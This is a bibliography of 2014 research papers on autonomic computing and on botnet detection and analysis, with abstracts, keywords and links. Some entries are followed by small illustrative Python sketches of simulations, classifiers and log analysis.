  • Vollmer, T.; Manic, M.; Linda, O., "Autonomic Intelligent Cyber-Sensor to Support Industrial Control Network Awareness," Industrial Informatics, IEEE Transactions on , vol.10, no.2, pp.1647,1658, May 2014. The proliferation of digital devices in a networked industrial ecosystem, along with an exponential growth in complexity and scope, has resulted in elevated security concerns and management complexity issues. This paper describes a novel architecture utilizing concepts of autonomic computing and a simple object access protocol (SOAP)-based interface to metadata access points (IF-MAP) external communication layer to create a network security sensor. This approach simplifies integration of legacy software and supports a secure, scalable, and self-managed framework. The contribution of this paper is twofold: 1) a flexible two-level communication layer based on autonomic computing and service oriented architecture is detailed and 2) three complementary modules that dynamically reconfigure in response to a changing environment are presented. One module utilizes clustering and fuzzy logic to monitor traffic for abnormal behavior. Another module passively monitors network traffic and deploys deceptive virtual network hosts. These components of the sensor system were implemented in C++ and PERL and utilize a common internal D-Bus communication mechanism. A proof of concept prototype was deployed on a mixed-use test network showing the possible real-world applicability. In testing, 45 of the 46 network-attached devices were recognized and 10 of the 12 emulated devices were created with specific operating system and port configurations. In addition, the anomaly detection algorithm achieved a 99.9% recognition rate. All output from the modules was correctly distributed using the common communication structure.
    Keywords: access protocols; computer network security; fault tolerant computing; field buses; fuzzy logic; industrial control; intelligent sensors; metadata; network interfaces; pattern clustering; C++; IF-MAP; PERL; SOAP-based interface; anomaly detection algorithm; autonomic computing; autonomic intelligent cyber-sensor; digital device proliferation; flexible two-level communication layer; fuzzy logic; industrial control network awareness; internal D-Bus communication mechanism; legacy software; metadata access point external communication layer; mixed-use test network; network security sensor; networked industrial ecosystem; proof of concept prototype; self-managed framework; service oriented architecture; simple object access protocol-based interface; traffic monitor; virtual network hosts; Autonomic computing; control systems; industrial ecosystems; network security; service-oriented architecture (ID#:14-2047)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547755&isnumber=6809862
  • Azab, M., "Multidimensional Diversity Employment for Software Behavior Encryption," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on, vol., no., pp.1,5, March 30 2014-April 2, 2014. Modern cyber systems and their integration with infrastructure have an immense effect on productivity and quality of life. Their involvement in our daily lives elevates the need for means to ensure their resilience against attacks and failures. One major threat is software monoculture. Recent research has demonstrated the danger of software monoculture and presented diversity to reduce the attack surface. In this paper, we propose ChameleonSoft, a multidimensional software diversity employment to, in effect, induce spatiotemporal software behavior encryption and a moving target defense. ChameleonSoft introduces a loosely coupled, online programmable software-execution foundation separating logic, state and physical resources. The elastic construction of the foundation enables ChameleonSoft to define running software as a set of behaviorally-mutated, functionally-equivalent code variants. ChameleonSoft intelligently shuffles these variants at runtime while changing their physical location, inducing enough untraceable confusion and diffusion to encrypt the execution behavior of the running software. ChameleonSoft is also equipped with an autonomic failure recovery mechanism for enhanced resilience. In order to test the applicability of the proposed approach, we present a prototype of the ChameleonSoft Behavior Encryption (CBE) and recovery mechanisms. Further, using analysis and simulation, we study the performance and security aspects of the proposed system. This study aims to assess the provisioned level of security by measuring the avalanche effect percentage and the induced confusion and diffusion levels to evaluate the strength of the CBE mechanism. Further, we compute the computational cost of security provisioning and enhancing system resilience.
    Keywords: computational complexity; cryptography; multidimensional systems; software fault tolerance; system recovery; CBE mechanism; ChameleonSoft Behavior Encryption; ChameleonSoft recovery mechanisms; autonomic failure recovery mechanism; avalanche effect percentage; behaviorally-mutated functionally-equivalent code variants; computational cost; confusion levels; diffusion levels; moving target defense; multidimensional software diversity employment; online programmable software-execution foundation separating logic; security level; security provisioning; software monoculture; spatiotemporal software behavior encryption; system resilience; Employment; Encryption; Resilience; Runtime; Software; Spatiotemporal phenomena (ID#:14-2048)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814033&isnumber=6813963
  • Schaefer, J., "A Semantic Self-Management Approach For Service Platforms," Network Operations and Management Symposium (NOMS), 2014 IEEE, vol., no., pp.1,4, 5-9 May 2014. Future personal living environments feature an increasing number of convenience-, health- and security-related applications provided by distributed services, which not only support users but also require tasks such as installation, configuration and continuous administration. These tasks are becoming tiresome, complex and error-prone. One way to escape this situation is to enable service platforms to configure and manage themselves. The approach presented here extends services with semantic descriptions to enable platform-independent autonomous service level management using model driven architecture and autonomic computing concepts. It has been implemented as an OSGi-based semantic autonomic manager, whose concept, prototypical implementation and evaluation are presented.
    Keywords: distributed processing; fault tolerant computing; service-oriented architecture; OSGi-based semantic autonomic manager; autonomic computing concepts; configuration task; continuous administration task; convenience-related applications; distributed services; health-related applications; installation task; model driven architecture; platform-independent autonomous service level management; security-related applications; semantic descriptions; semantic self-management approach; service platforms; Computational modeling; Grounding; Knowledge based systems; Monitoring; Ontologies; Quality of service; Semantics; Autonomic Computing; Model Driven Architecture; Ontologies; Semantic Services; Service Level Management (ID#:14-2049)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838329&isnumber=6838210
  • Leong, P.; Liming Lu, "Multiagent Web for the Internet of Things," Information Science and Applications (ICISA), 2014 International Conference on, vol., no., pp.1,4, 6-9 May 2014. The Internet of Things (IOT) is a network of networks where massively large numbers of objects or things are interconnected to each other through the network. The Internet of Things brings along many new possibilities for applications to improve human comfort and quality of life. Complex systems such as the Internet of Things are difficult to manage because of the emergent behaviours that arise from the complex interactions between their constituent parts. Our key contribution in the paper is a proposed multiagent web for the Internet of Things. A corresponding data management architecture is also proposed. The multiagent architecture provides autonomic characteristics for the IOT, making it manageable. In addition, the multiagent web allows for flexible processing on heterogeneous platforms, as we leverage web protocols such as HTTP and language-independent data formats such as JSON for communication between agents. The proposed architecture enables a scalable architecture and infrastructure for a web-scale multiagent Internet of Things.
    Keywords: Internet; Internet of Things; electronic data interchange; multi-agent systems; transport protocols; HTTP; JSON; Web protocols; Web-scale multiagent Internet of Things; data management architecture; heterogeneous platforms; language independent data formats; multiagent Web; multiagent architecture; network of networks; Cloud computing; Computer architecture; Databases; Internet of Things; Protocols; Security; Sensors (ID#:14-2050)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847432&isnumber=6847317
  • Gelenbe, E., "A Software Defined Self-Aware Network: The Cognitive Packet Network," Network Cloud Computing and Applications (NCCA), 2014 IEEE 3rd Symposium on , vol., no., pp.9,14, 5-7 Feb. 2014. This article is a summary description of the Cognitive Packet Network (CPN), which is an example both of a completely software defined network (SDN) and of a self-aware computer network (SAN) that has been completely implemented and used in numerous experiments. CPN is able to observe its own internal performance as well as the interfaces of the external systems that it interacts with, in order to modify its behaviour so as to adaptively achieve objectives, such as discovering services for its users, improving their Quality of Service (QoS), reducing its own energy consumption, compensating for components which fail or malfunction, detecting and reacting to intrusions, and defending itself against attacks.
    Keywords: cognitive radio; quality of service; software radio; telecommunication computing; telecommunication security; CPN; QoS; SAN; SDN; cognitive packet network; quality of service; self-aware computer network; software defined self-aware network; Delays; Energy consumption; Quality of service; Security; Software; Storage area networks; QoS; autonomic communications; energy savings; measurement based goal driven behaviour; network security; self-aware networks; software defined networks (ID#:14-2051)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786756&isnumber=6786745
  • Kuklinski, S., "Programmable Management Framework For Evolved SDN," Network Operations and Management Symposium (NOMS), 2014 IEEE, vol., no., pp.1,8, 5-9 May 2014. In the paper a programmable management framework for SDN networks is presented. The concept is in line with SDN philosophy - it can be programmed from scratch. The implemented management functions can be case dependent. The concept introduces a new node in the SDN architecture, namely the SDN manager. In compliance with the latest trends in network management, the approach allows for embedded management of all network nodes and gradual implementation of management functions, providing code lifecycle management as well as the ability to update code on the fly. The described concept is a bottom-up approach whose key element is a distributed execution environment (PDEE) based on well-established technologies like OSGI and FIPA. The described management idea has a strong impact on the evolution of the SDN architecture, because the proposed distributed execution environment is generic and can therefore be used not only for management, but also for distributing control or application functions.
    Keywords: codes; software radio; telecommunication network management; FIPA; OSGI; PDEE; SDN architecture; SDN manager; SDN networks; SDN philosophy; bottom-up approach; code lifecycle management; distributed execution environment; evolved SDN; management functions; network management; on-the-fly code update; programmable management framework; software-defined networking; Computer architecture; Control systems; Hardware; IP networks; Protocols; Security; Software; FIPA; OSGi; SDN; autonomic network management; network management (ID#:14-2052)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838410&isnumber=6838210
  • Ravindran, K.; Rabby, M.; Adiththan, A, "Model-based Control Of Device Replication For Trusted Data Collection," Modeling and Simulation of Cyber-Physical Energy Systems (MSCPES), 2014 Workshop on , vol., no., pp.1,6, 14-14 April 2014. Voting among replicated data collection devices is a means to achieve dependable data delivery to the end-user in a hostile environment. Failures may occur during the data collection process, such as data corruption by malicious devices and security/bandwidth attacks on data paths. For a voting system, how often correct data is delivered to the user in a timely manner and with low overhead depicts the QoS. Prior works have focused on algorithm correctness issues and performance engineering of the voting protocol mechanisms. In this paper, we study methods for autonomic management of device replication in the voting system to deal with situations where the available network bandwidth fluctuates, the fault parameters change unpredictably, and the devices have battery energy constraints. We treat the voting system as a 'black-box' with programmable I/O behaviors. A management module exercises macroscopic control of the voting box with situational inputs such as application priorities, network resources, battery energy, and external threat levels.
    Keywords: quality of service; security of data; trusted computing; QoS; algorithm correctness; bandwidth attack; black-box; data corruptions; device replication autonomic management; malicious devices; security attack; trusted data collection; voting protocol mechanisms; Bandwidth; Batteries; Data collection; Delays; Frequency modulation; Protocols; Quality of service; Adaptive Fault-tolerance; Attacker Modeling; Hierarchical Control; Sensor Replication; Situational Assessment (ID#:14-2053)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842399&isnumber=6842390
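
The voting core of such a system is small; the management problem lies in choosing its parameters. The deliberately simple stand-in below majority-votes replicated readings against a fraction of malicious devices; a management module of the kind the paper describes would tune the replica count and voting rule to threat level and battery budget. All numbers are illustrative.

import random
from collections import Counter

random.seed(7)

def vote(readings):
    """Majority vote over replicated readings; returns the winning value and
    whether a strict majority backed it (the QoS-relevant success condition)."""
    value, count = Counter(readings).most_common(1)[0]
    return value, count > len(readings) // 2

n_devices, p_malicious, delivered = 7, 0.2, 0
for round_ in range(1000):
    truth = round_ % 10
    readings = [random.randint(0, 9) if random.random() < p_malicious else truth
                for _ in range(n_devices)]
    value, ok = vote(readings)
    delivered += (ok and value == truth)
print("correct deliveries:", delivered, "/ 1000")
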
  • Hamze, M.; Mbarek, N.; Togni, O., "Self-establishing a Service Level Agreement Within Autonomic Cloud Networking Environment," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,4, 5-9 May 2014. Today, cloud networking, which is the ability to connect the user with his cloud services and to interconnect these services within an inter-cloud approach, is one of the recent research areas in the cloud computing research community. The main drawback of cloud networking is the lack of Quality of Service (QoS) guarantees and management in conformance with a corresponding Service Level Agreement (SLA). Several research works have been proposed for establishing SLAs in cloud computing, but not in cloud networking. In this paper, we propose an architecture for self-establishing an end-to-end service level agreement between a Cloud Service User (CSU) and a Cloud Service Provider (CSP) in a cloud networking environment. We focus on QoS parameters for NaaS and IaaS services. The architecture ensures a self-establishing of the proposed SLA using autonomic cloud managers.
    Keywords: cloud computing; contracts; quality of service; CSP; IaaS services; NaaS services; QoS; Quality of Service; SLA; autonomic cloud managers; autonomic cloud networking environment; cloud computing research communities; cloud service provider; cloud service user; service level agreement; Availability; Bandwidth; Cloud computing; Computer architecture; Quality of service; Security (ID#:14-2054)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838336&isnumber=6838210

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Botnets

Botnets



Botnets, a common security threat, are used for a variety of attacks: spam, distributed denial of service (DDOS), adware and spyware, scareware, and brute-forcing services. Their reach and the challenge of detecting and neutralizing them are compounded in the cloud and on mobile networks. Research presented in the first half of 2014 shows several approaches to meeting the challenge botnets pose.

  • Lu, Zhuo; Wang, Wenye; Wang, Cliff, "How Can Botnets Cause Storms? Understanding the Evolution And Impact Of Mobile Botnets," INFOCOM, 2014 Proceedings IEEE, vol., no., pp.1501,1509, April 27, 2014-May 2, 2014. A botnet in mobile networks is a collection of compromised nodes due to mobile malware, which are able to perform coordinated attacks. Different from Internet botnets, mobile botnets do not need to propagate using centralized infrastructures, but can keep compromising vulnerable nodes in close proximity and evolving organically via data forwarding. Such a distributed mechanism relies heavily on node mobility as well as wireless links, and therefore breaks down the underlying premise in existing epidemic modeling for Internet botnets. In this paper, we adopt a stochastic approach to study the evolution and impact of mobile botnets. We find that node mobility can be a trigger to botnet propagation storms: the average size (i.e., number of compromised nodes) of a botnet increases quadratically over time if the mobility range that each node can reach exceeds a threshold; otherwise, the botnet can only contaminate a limited number of nodes with average size always bounded above. This also reveals that mobile botnets can propagate at the fastest rate of quadratic growth in size, which is substantially slower than the exponential growth of Internet botnets. To measure the denial-of-service impact of a mobile botnet, we define a new metric, called last chipper time, which is the last time that service requests, even partially, can still be processed on time as the botnet keeps propagating and launching attacks. The last chipper time is identified to decrease at most on the order of 1/B, where B is the network bandwidth. This result reveals that although increasing network bandwidth can help with mobile services, it can at the same time escalate the risk of services being disrupted by mobile botnets.
    Keywords: Internet; Malware; Mobile computing; Mobile nodes; Peer-to-peer computing (ID#:14-2055)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848085&isnumber=6847911
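
The mobility-threshold effect can be reproduced with a toy spatial susceptible-infected simulation: nodes take random steps bounded by their mobility range, and any susceptible node within contact range of a bot is compromised. The parameters below are arbitrary; the sketch only illustrates why small and large mobility ranges produce very different growth curves, not the paper's stochastic analysis.

import numpy as np

rng = np.random.default_rng(8)

def botnet_size(mobility_range, n=1500, area=100.0, contact=1.0, steps=50):
    """Toy spatial SI model of organic botnet spread via close proximity."""
    pos = rng.uniform(0, area, size=(n, 2))
    infected = np.zeros(n, bool)
    infected[0] = True                                  # patient-zero bot
    sizes = []
    for _ in range(steps):
        # every node takes a random step bounded by its mobility range
        pos = (pos + rng.uniform(-mobility_range, mobility_range, (n, 2))) % area
        # susceptible nodes within contact range of any bot are compromised
        d = np.linalg.norm(pos[None, :, :] - pos[infected][:, None, :], axis=2)
        infected |= (d < contact).any(axis=0)
        sizes.append(int(infected.sum()))
    return sizes

print("small mobility:", botnet_size(0.2)[::10])
print("large mobility:", botnet_size(5.0)[::10])
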
  • Arora, D.; Verigin, A; Godkin, T.; Neville, S.W., "Statistical Assessment of Sybil-Placement Strategies within DHT-Structured Peer-to-Peer Botnets," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.821,828, 13-16 May 2014. Botnets are a well recognized global cyber-security threat as they enable attack communities to command large collections of compromised computers (bots) on-demand. Peer-to-peer (P2P) distributed hash tables (DHT) have become particularly attractive botnet command and control (C&C) solutions due to the high-level resiliency gained via the diffused random graph overlays they produce. The injection of Sybils, computers pretending to be valid bots, remains a key defensive strategy against DHT-structured P2P botnets. This research uses packet level network simulations to explore the relative merits of random, informed, and partially informed Sybil placement strategies. It is shown that random placements perform nearly as effectively as the tested more informed strategies, which require higher levels of inter-defender co-ordination. Moreover, it is shown that aspects of the DHT-structured P2P botnets behave as statistically nonergodic processes, when viewed from the perspective of stochastic processes. This suggests that although optimal Sybil placement strategies appear to exist, they would need careful tuning to each specific P2P botnet instance.
    Keywords: command and control systems; computer network security; invasive software; peer-to-peer computing; statistical analysis; stochastic processes; C&C solutions; DHT-structured P2P botnets; DHT-structured peer-to-peer botnets; Sybil placement strategy statistical assessment; botnet command and control solution; compromised computer on-demand collections; cyber security threat; diffused random graph; interdefender coordination; packet level network simulation; peer-to-peer distributed hash tables; stochastic process; Computational modeling; Computers; Internet; Network topology; Peer-to-peer computing; Routing; Topology (ID#:14-2056)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838749&isnumber=6838626
  • Derhab, A; Bouras, A; Bin Muhaya, F.; Khan, M.K.; Yang Xiang, "Spam Trapping System: Novel security framework to fight against spam botnets," Telecommunications (ICT), 2014 21st International Conference on , vol., no., pp.467,471, 4-7 May 2014. In this paper, we draw inspiration from two analogies, the warfare kill zone and the airport check-in system, to tackle the issue of spam botnet detection. We add a new line of defense to the defense-in-depth model called the third line. This line is represented by a security framework named the Spam Trapping System (STS), which adopts the prevent-then-detect approach to fight against spam botnets. The framework exploits the application sandboxing principle to prevent the spam from going out of the host and detect the corresponding malware bot. We show that the proposed framework can ensure better security against malware bots. In addition, an analytical study demonstrates that the framework offers optimal performance in terms of detection time and computational cost in comparison to intrusion detection systems based on static and dynamic analysis.
    Keywords: invasive software; program diagnostics; unsolicited e-mail; STS; airport check-in system; computational cost; defense-in-depth model; dynamic analysis; intrusion detection system; malware bot; prevent-then-detect approach; sandboxing principle; security framework; spam botnet detection; spam botnets; spam trapping system; static analysis; warfare kill zone; Airports; Charge carrier processes; Cryptography; Malware; Unsolicited electronic mail (ID#:14-2057)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845160&isnumber=6845063
  • Rrushi, Julian L., "A Steganographic Approach to Localizing Botmasters," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.852,859, 13-16 May 2014. Law enforcement employs an investigative approach based on marked money bills to track illegal drug dealers. In this paper we discuss research that aims at providing law enforcement with the cyber counterpart of that approach in order to track perpetrators that operate botnets. We have devised a novel steganographic approach that generates a watermark hidden within a honey token, i.e., a decoy Word document. The covert bits that comprise the watermark are carried via secret interpretation of object properties in the honey token. The encoding and decoding of object properties into covert bits follow a scheme based on bijective functions generated via a chaotic logistic map. The watermark is retrievable via a secret cryptographic key, which is generated and held by law enforcement. The honey token is leaked to a botmaster via a honey net. In the paper, we elaborate on possible means by which law enforcement can track the leaked honey token to the IP address of a botmaster's machine.
    Keywords: botnets; computer security; steganography (ID#:14-2058)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844746&isnumber=6844560
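
One ingredient of the scheme, keying covert bits to a chaotic logistic map, is easy to sketch. The toy code below derives a keystream from a secret initial condition and XORs it with the watermark bits; the paper's actual construction interprets Word object properties via bijective functions generated from the map, which this sketch does not attempt.

def logistic_keystream(key, n_bits, r=3.99, burn_in=100):
    """Derive a bit stream from a chaotic logistic map seeded by a secret key
    in (0, 1); only the key holder can regenerate the same stream."""
    x = key
    for _ in range(burn_in):          # discard the transient
        x = r * x * (1 - x)
    bits = []
    for _ in range(n_bits):
        x = r * x * (1 - x)
        bits.append(1 if x > 0.5 else 0)
    return bits

def encode(watermark_bits, key):
    ks = logistic_keystream(key, len(watermark_bits))
    return [b ^ k for b, k in zip(watermark_bits, ks)]   # covert bits

decode = encode            # XOR with the same keystream inverts the mapping

wm = [1, 0, 1, 1, 0, 0, 1, 0]
covert = encode(wm, key=0.7314159)
assert decode(covert, key=0.7314159) == wm
print("covert bits hidden in the honey token:", covert)
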
  • Stevanovic, M.; Pedersen, J.M., "An efficient flow-based botnet detection using supervised machine learning," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.797,801, 3-6 Feb. 2014. Botnet detection represents one of the most crucial prerequisites of successful botnet neutralization. This paper explores how accurate and timely detection can be achieved by using supervised machine learning as the tool of inferring about malicious botnet traffic. In order to do so, the paper introduces a novel flow-based detection system that relies on supervised machine learning for identifying botnet network traffic. For use in the system we consider eight highly regarded machine learning algorithms, indicating the best performing one. Furthermore, the paper evaluates how much traffic needs to be observed per flow in order to capture the patterns of malicious traffic. The proposed system has been tested through the series of experiments using traffic traces originating from two well-known P2P botnets and diverse non-malicious applications. The results of experiments indicate that the system is able to accurately and timely detect botnet traffic using purely flow-based traffic analysis and supervised machine learning. Additionally, the results show that in order to achieve accurate detection traffic flows need to be monitored for only a limited time period and number of packets per flow. This indicates a strong potential of using the proposed approach within a future on-line detection framework.
    Keywords: computer network security; invasive software; learning (artificial intelligence); peer-to-peer computing; telecommunication traffic; P2P botnets; botnet neutralization; flow-based botnet detection; flow-based traffic analysis; malicious botnet network traffic identification; nonmalicious applications; packet flow; supervised machine learning; Accuracy; Bayes methods; Feature extraction; Protocols; Support vector machines; Training; Vegetation; Botnet; Botnet detection; Machine learning; Traffic analysis; Traffic classification (ID#:14-2059)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785439&isnumber=6785290
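
A minimal version of such a flow-based detector can be assembled with off-the-shelf supervised learning. The sketch below trains a random forest on synthetic per-flow features; the feature set, distributions, and labels are invented placeholders rather than the paper's traffic traces, and serve only to show the shape of the pipeline.

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(9)

def synth_flows(n, botnet):
    """Synthetic per-flow features: duration, packet count, mean packet size,
    bytes/s, inter-arrival jitter.  Bot C&C flows here are small and periodic."""
    if botnet:
        dur = rng.normal(30, 5, n);   pkts = rng.normal(12, 2, n)
        size = rng.normal(90, 10, n); jit = rng.normal(0.01, 0.005, n)
    else:
        dur = rng.exponential(20, n);  pkts = rng.exponential(40, n)
        size = rng.normal(600, 200, n); jit = rng.exponential(0.2, n)
    rate = pkts * size / np.maximum(dur, 1e-3)
    return np.column_stack([dur, pkts, size, rate, jit])

X = np.vstack([synth_flows(3000, False), synth_flows(3000, True)])
y = np.array([0] * 3000 + [1] * 3000)
Xtr, Xte, ytr, yte = train_test_split(X, y, test_size=0.3, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(Xtr, ytr)
print(classification_report(yte, clf.predict(Xte), target_names=["benign", "bot"]))
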
  • Dainotti, A; King, A; Claffy, K.; Papale, F.; Pescape, A, "Analysis of a "/0" Stealth Scan From a Botnet," Networking, IEEE/ACM Transactions on, vol. PP, no.99, pp.1, 1, January 2014. Botnets are the most common vehicle of cyber-criminal activity. They are used for spamming, phishing, denial-of-service attacks, brute-force cracking, stealing private information, and cyber warfare. Botnets carry out network scans for several reasons, including searching for vulnerable machines to infect and recruit into the botnet, probing networks for enumeration or penetration, etc. We present the measurement and analysis of a horizontal scan of the entire IPv4 address space conducted by the Sality botnet in February 2011. This 12-day scan originated from approximately 3 million distinct IP addresses and used a heavily coordinated and unusually covert scanning strategy to try to discover and compromise VoIP-related (SIP server) infrastructure. We observed this event through the UCSD Network Telescope, a /8 darknet continuously receiving large amounts of unsolicited traffic, and we correlate this traffic data with other public sources of data to validate our inferences. Sality is one of the largest botnets ever identified by researchers. Its behavior represents ominous advances in the evolution of modern malware: the use of more sophisticated stealth scanning strategies by millions of coordinated bots, targeting critical voice communications infrastructure. This paper offers a detailed dissection of the botnet's scanning behavior, including general methods to correlate, visualize, and extrapolate botnet behavior across the global Internet.
    Keywords: Animation; Geology; IP networks; Internet; Ports (Computers); Servers; Telescopes; Botnet; Internet background radiation; Internet telephony; Network Telescope; VoIP; communication system security; darknet; network probing; scanning (ID#:14-2060)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6717049&isnumber=4359146
  • Alomari, E.; Manickam, S.; Gupta, B.B.; Singh, P.; Anbar, M., "Design, Deployment And Use Of HTTP-Based Botnet (HBB) Testbed," Advanced Communication Technology (ICACT), 2014 16th International Conference on, vol., no., pp.1265,1269, 16-19 Feb. 2014. Botnets are among the most widespread and serious malware threats occurring in today's cyber attacks. A botnet is a group of Internet-connected computer programs communicating with other similar programs in order to perform various attacks, and HTTP-based botnets are among the most dangerous botnets in use today. In botnet detection, behavioural-based approaches in particular suffer from the unavailability of benchmark datasets, which hampers precise evaluation, comparison, and deployment of botnet detection systems. Most datasets in the botnet field come from local environments, cannot be used at large scale due to privacy concerns, do not reflect common trends, and lack some statistical features. To the best of our knowledge, no benchmark dataset is available that captures an HTTP-based botnet (HBB) performing Distributed Denial of Service (DDoS) attacks against Web servers using the HTTP-GET flooding method, nor is any botnet-infected Web access log available to researchers. Therefore, this paper illustrates a complete testbed that implements a real-time HTTP-based botnet performing a variety of DDoS attacks against Web servers using the HTTP-GET flooding method. In addition, Web access logs with HTTP bot traces are generated. These real-time datasets and Web access logs can be used to study the behaviour of HTTP-based botnets as well as to evaluate the different solutions proposed by various researchers to detect them. (A hedged log-analysis sketch follows this citation.)
    Keywords: invasive software; DDoS attacks; HBB testbed; HTTP-GET flooding method; Internet-connected computer programs; Web access log; Web servers; behavioural-based approaches; botnet detection systems; cyber attacks; distributed denial of service attacks; http bot traces; malware; real time HTTP-based botnet; Computer crime; Floods; Intrusion detection; Web servers; Botnet; Cyber attacks; DDoS attacks; HTTP flooding; HTTP-based botnet (ID#:14-2061)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779162&isnumber=6778899
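One use of such generated Web access logs is detection-side analysis. The sketch below, a hedged illustration rather than the paper's method, counts GET requests per source IP in a Common Log Format access log and flags heavy hitters; the log format, regex, and threshold are assumptions.

```python
# A minimal HTTP-GET flood indicator over an access log; format and threshold assumed.
import re
from collections import Counter

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET ')

def flood_suspects(log_lines, threshold=100):
    """Count GET requests per client IP and return sources above the threshold."""
    gets = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            gets[m.group(1)] += 1
    return {ip: n for ip, n in gets.items() if n >= threshold}

sample = ['10.0.0.7 - - [16/Feb/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 512'] * 150
print(flood_suspects(sample))  # {'10.0.0.7': 150}
```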
  • Haddadi, Fariba; Morgan, Jillian; Filho, Eduardo Gomes; Zincir-Heywood, A. Nur, "Botnet Behaviour Analysis Using IP Flows: With HTTP Filters Using Classifiers," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.7,12, 13-16 May 2014. Botnets are one of the most destructive threats against cyber security. Recently, the HTTP protocol has frequently been utilized by botnets as the Command and Control (C&C) protocol. In this work, we aim to detect HTTP-based botnet activity via botnet behaviour analysis using a machine learning approach. To achieve this, we employ flow-based network traffic analysis utilizing NetFlow (via softflowd). The proposed botnet analysis system is implemented by employing two different machine learning algorithms, C4.5 and Naive Bayes. Our results show that the C4.5-based classifier obtained very promising performance in detecting HTTP-based botnet activity.
    Keywords: botnet detection; machine learning based analysis; traffic IP-flow analysis (ID#:14-2062)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844605&isnumber=6844560
  • Badis, Hammi; Doyen, Guillaume; Khatoun, Rida, "Understanding botclouds from a system perspective: A principal component analysis," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. Cloud computing is gaining ground and becoming one of the fastest growing segments of the IT industry. However, while its numerous advantages mainly support legitimate activity, it is now also exploited for a use it was not meant for: malicious users leverage its power and fast provisioning to turn it into an attack support. Botnets supporting DDoS attacks are among the greatest beneficiaries of this malicious use, since they can be set up on demand and at very large scale without requiring a long dissemination phase or expensive deployment costs. For cloud service providers, preventing their infrastructure from being turned into an Attack-as-a-Service delivery model is very challenging, since it requires detecting threats at the source, in a highly dynamic and heterogeneous environment. In this paper, we present the results of an experimental campaign performed in order to understand the operational behavior of a botcloud used for a DDoS attack. The originality of our work resides in the consideration of system metrics that, while never considered in state-of-the-art botnet detection, can be leveraged in the context of a cloud to enable source-based detection. Our study considers attacks based on both TCP-flood and UDP-storm, and for each of them we provide statistical results, based on a principal component analysis, that highlight the recognizable behavior of a botcloud compared to other legitimate workloads. (A toy PCA illustration follows this citation.)
    Keywords: Cloud computing; Computer crime; Context; Correlation; Measurement; Principal component analysis; Storms (ID#:14-2063)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838310&isnumber=6838210
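The core statistical step, projecting system metrics onto principal components so that botcloud behavior separates from legitimate workloads, can be sketched as below; the metric set, distributions, and sample sizes are invented for illustration and are not the authors' data.

```python
# A toy PCA illustration with synthetic system metrics.
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
# Columns: CPU %, outbound packets/s, context switches/s, memory %
legit = rng.normal([40, 200, 900, 55], [10, 50, 150, 8], size=(100, 4))
botcloud = rng.normal([75, 5000, 300, 30], [8, 800, 80, 5], size=(100, 4))

X = np.vstack([legit, botcloud])
pca = PCA(n_components=2).fit(X)
Z = pca.transform(X)
print("explained variance ratio:", pca.explained_variance_ratio_)
print("legit centroid:   ", Z[:100].mean(axis=0))
print("botcloud centroid:", Z[100:].mean(axis=0))
```

Well-separated centroids in the low-dimensional factorial space are what make a source-based detector plausible.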
  • Hammi, Badis; Khatoun, Rida; Doyen, Guillaume, "A Factorial Space for a System-Based Detection of Botcloud Activity," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30, 2014-April 2, 2014. Today, beyond legitimate usage, the numerous advantages of cloud computing are exploited by attackers, and botnets supporting DDoS attacks are among the greatest beneficiaries of this malicious use. Such a phenomenon is a major issue, since it strongly increases the power of distributed massive attacks while involving the responsibility of cloud service providers that do not own appropriate solutions. In this paper, we present an original approach that enables source-based detection of UDP-flood DDoS attacks based on a distributed system behavior analysis. Based on a principal component analysis, our contribution consists of: (1) defining the involvement of system metrics in a botcloud's behavior, (2) showing the invariability of the factorial space that defines a botcloud's activity, and (3) using this factorial space to enable botcloud detection among several legitimate activities.
    Keywords: (not provided) (ID#:14-2064)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6813996&isnumber=6813963
